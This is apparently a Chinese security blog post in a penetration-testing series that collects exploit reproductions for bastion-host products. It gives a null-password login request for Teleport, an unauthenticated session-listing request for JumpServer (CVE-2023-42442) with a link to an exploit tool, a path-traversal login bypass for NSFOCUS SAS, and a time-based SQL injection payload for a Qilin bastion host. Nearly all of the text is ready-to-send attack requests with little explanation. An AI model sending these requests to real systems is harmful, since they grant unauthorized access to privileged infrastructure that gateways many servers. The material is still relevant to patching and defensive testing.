安全云服务攻防第100天:云产品篇&堡垒机场景&JumpServer&绿盟SAS&Teleport&麒麟&齐治
Yatming的博客Teltport(小型)-任意用户登录
1
2
| post:/auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"xxxx","oath":"","remember":false}
|
JumpServer(用的比较多)-CVE-2023-42442 未授权访问漏洞复现
利用工具:
1
| https://github.com/tarihub/blackjump
|
CVE-2023-42442 JumpServer未授权访问漏洞复现
参考文章:https://mp.weixin.qq.com/s/NCSnTsOMxslmf5S6d9896A
漏洞复现:
1
2
3
4
5
| GET /api/v1/terminal/sessions/ HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
|
绿盟SAS堡垒机-任意用户登录漏洞
参考文章:https://mp.weixin.qq.com/s/CtswTTvuzyQXuUNMKzRHBg
漏洞复现:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: xx.xx.xx.xx
Cookie: PHPSESSID=03eea4323452c328c6462f1bb50a0a9b; Hm_lvt_2743f882f7de0bd7d8ffc885a04c90f5=1692345507; Hm_lpvt_2743f882f7de0bd7d8ffc885a04c90f5=1692345507; left_menustatue_NSFOCUSnbspSASH=0|0|https://yzyx.loogear.com/home/status
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
|
麒麟堡垒机-sql注入
参考文章:https://blog.csdn.net/qq_41904294/article/details/132328217
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| POST /baoleiji/api/tokens HTTP/1.1
Host: xx.xx.xx.xx
Cookie: PHPSESSID=66b53a13d3db0e27a9676d419c374c42
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(10)))ptGN) AND'AAdm'='AAdm&title=%40127.0.0.1
|
